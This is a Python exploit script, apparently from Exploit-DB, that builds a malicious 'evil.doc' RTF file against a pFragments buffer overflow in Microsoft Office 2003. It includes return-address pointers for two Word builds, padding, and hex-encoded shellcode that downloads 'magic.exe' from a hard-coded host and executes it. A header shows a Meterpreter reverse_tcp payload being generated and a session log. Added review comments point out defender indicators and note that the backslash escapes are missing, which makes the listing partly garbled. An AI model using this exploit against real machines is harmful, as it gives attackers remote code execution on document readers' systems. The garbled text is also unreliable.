
# Title : Microsoft Office 2003 Home/Pro 0day
# Published : 2012-01-08
# Author :


#!/usr/bin/python

#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#

#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1, 2, 3             #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges)                             #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to      #
# bring them all and in the darkness bind them!!                                    #
#                                                                                   #
# Greetings: offsec, corelan, setoolkit                                             #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py                                     #
#     root@bt:~/Desktop/office# mv evil.doc /var/www/                               #
#                                                                                   #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
#     > /var/www/magic.exe                                                          #
#                                                                                   #
# (3) msf  exploit(handler) > exploit                                               #
#                                                                                   #
#    [*] Started reverse handler on 192.168.111.132:9988                            #
#    [*] Starting the payload handler...                                            #
#    [*] Sending stage (752128 bytes) to 192.168.111.128                            #
#    [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
#        at 2012-01-08 18:46:26 +0800                                               #
#                                                                                   #
#    meterpreter > ipconfig                                                         #
#                                                                                   #
#    MS TCP Loopback interface                                                      #
#    Hardware MAC: 00:00:00:00:00:00                                                #
#    IP Address  : 127.0.0.1                                                        #
#    Netmask     : 255.0.0.0                                                        #
#                                                                                   #
#   AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport               #
#   Hardware MAC: 00:0c:29:6c:92:42                                                 #
#   IP Address  : 192.168.111.128                                                   #
#   Netmask     : 255.255.255.0                                                     #
#-----------------------------------------------------------------------------------#

import binascii

# Output file name (hard-coded, not a CLI argument). Despite the ".doc"
# extension the script writes plain text with an RTF-style body at the end of
# the file; no OLE/.doc container library is involved.
filename = "evil.doc"

#-----------------------------------------------------------------------------------#
# File Structure                                                                    #
#-----------------------------------------------------------------------------------#
# Document preamble. NOTE(review): in this listing only the "\r" inside "{\rt"
# still reads as a Python escape (a carriage return); the shape/property tokens
# (shp, sp, sn, sv, pFragments) appear without the backslashes that RTF control
# words carry, presumably lost when the page was extracted -- confirm against
# the original. A pFragments shape property whose "sv" value is oversized is
# the trait the Exploit-DB note above ties to the ms10_087 pFragments module,
# so an RTF scanner can key on that token pair. The name shadows the Python 2
# builtin `file`.
file = (
"{\rt##{shp{sp}}{shp{sp}}{shp{sp}}{shp{*shpinstshpfhdr0shpbxcolumns"
"hpbyparash pwr2}{sp{sn {}{}{sn}{sn}{**}pFragments}{***}{sv{*****"
"*********************}9;2;ffffffffff")

#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe"                #
# ==> cmd execute "a.exe"                                                           #
#-----------------------------------------------------------------------------------#
# Stager text, given as ASCII hex digits of each byte (the same convention the
# EIP value below uses). The banner describes it as a download-to-"a.exe"-then-
# execute stub; the trailing digits decode to "cmd.exe /c  a.exe" plus a NUL
# and "urlm" appears earlier, which is consistent with that description -- the
# remainder is not verified here. As listed, each "xNN" is three literal
# characters rather than an escaped byte, so this listing does not reproduce
# the stager byte-for-byte. For defenders, "a.exe" dropped into the working
# directory and the hex-encoded download URL below are the host/network
# indicators of this sample.
magic = (
"x65x62x37x37x33x31x63x39x36x34x38x62x37x31x33x30"
"x38x62x37x36x30x63x38x62x37x36x31x63x38x62x35x65"
"x30x38x38x62x37x65x32x30x38x62x33x36x36x36x33x39"
"x34x66x31x38x37x35x66x32x63x33x36x30x38x62x36x63"
"x32x34x32x34x38x62x34x35x33x63x38x62x35x34x30x35"
"x37x38x30x31x65x61x38x62x34x61x31x38x38x62x35x61"
"x32x30x30x31x65x62x65x33x33x34x34x39x38x62x33x34"
"x38x62x30x31x65x65x33x31x66x66x33x31x63x30x66x63"
"x61x63x38x34x63x30x37x34x30x37x63x31x63x66x30x64"
"x30x31x63x37x65x62x66x34x33x62x37x63x32x34x32x38"
"x37x35x65x31x38x62x35x61x32x34x30x31x65x62x36x36"
"x38x62x30x63x34x62x38x62x35x61x31x63x30x31x65x62"
"x38x62x30x34x38x62x30x31x65x38x38x39x34x34x32x34"
"x31x63x36x31x63x33x65x38x39x32x66x66x66x66x66x66"
"x35x66x38x31x65x66x39x38x66x66x66x66x66x66x65x62"
"x30x35x65x38x65x64x66x66x66x66x66x66x36x38x38x65"
"x34x65x30x65x65x63x35x33x65x38x39x34x66x66x66x66"
"x66x66x33x31x63x39x36x36x62x39x36x66x36x65x35x31"
"x36x38x37x35x37x32x36x63x36x64x35x34x66x66x64x30"
"x36x38x33x36x31x61x32x66x37x30x35x30x65x38x37x61"
"x66x66x66x66x66x66x33x31x63x39x35x31x35x31x38x64"
"x33x37x38x31x63x36x65x65x66x66x66x66x66x66x38x64"
"x35x36x30x63x35x32x35x37x35x31x66x66x64x30x36x38"
"x39x38x66x65x38x61x30x65x35x33x65x38x35x62x66x66"
"x66x66x66x66x34x31x35x31x35x36x66x66x64x30x36x38"
"x37x65x64x38x65x32x37x33x35x33x65x38x34x62x66x66"
"x66x66x66x66x66x66x64x30x36x33x36x64x36x34x32x65"
"x36x35x37x38x36x35x32x30x32x66x36x33x32x30x32x30"
"x36x31x32x65x36x35x37x38x36x35x30x30")

#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around:                                                                                 #
# (1) Standalone version, (2) XP Service Pack upgrade                                                                          #
################################################################################################################################
# Unfortunately though the exploit works perfectly for both versions they require different pointers to ESP...                 #
#                                                                                                                              #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "x36x36x34x33x33x32x33x30"                                                #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe                           #
#                                                                                                                              #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "x35x35x32x36x34x30x33x30"                                        #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#

# Return address written as the ASCII hex digits of the little-endian pointer
# (variant (1) from the table above: 0x30324366 -> "66433230"); the table lists
# the string belonging to the other build. As listed the "\x" escapes are
# missing, so this is literal text rather than the digits themselves.
EIP = "x36x36x34x33x33x32x33x30" # ASCII hex digits of the little-endian pointer

# Padding between the return address and the stager: one 8-digit value twice,
# 24 "A"s and 18 "90" pairs (presumably NOP bytes), all in the same hex-text
# form. Multiplying the escape-less text yields different lengths from what
# the author intended -- TODO confirm against the original.
filler = "x30x30x30x30x38x30x37x63"*2 + "x41"*24 + "x39x30"*18

# Trigger buffer appended to the still-open "sv" value: 501 "#"s, "05", 40
# "0"s, then EIP, filler and the stager. Its size relative to a normal shape
# property value is what a content scanner can flag. The name shadows the
# Python 2 builtin `buffer`.
buffer = "x23"*501 + "x30x35" + "x30"*40 + EIP + filler + magic

#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no         #
# restrictions on payload size or bad characters...                                 #
#-----------------------------------------------------------------------------------#

# Download location, hex-encoded with b2a_hex so it sits in the document in the
# same hex-text form as the stager; the hard-coded LAN address is the network
# indicator for this sample. b2a_hex accepts a str only on Python 2 -- on
# Python 3 it raises TypeError for str input (the shebang and the `file` /
# `buffer` names mark this as a Python 2 script).
URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)

URL2 = "00"        # presumably a NUL terminator for the URL, in hex-text form
nxt="{}}}}}}"      # closing braces, presumably balancing groups opened in `file`
nxt+="x0dx0a"      # intended CRLF; as listed it is the literal text "x0dx0a"
nxt+="}"

# Assemble and write the document in text mode. The open()/write()/close()
# sequence is not exception-safe (a `with` block would guarantee the close);
# the data contains no "\n", so text-mode newline translation has no effect.
textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()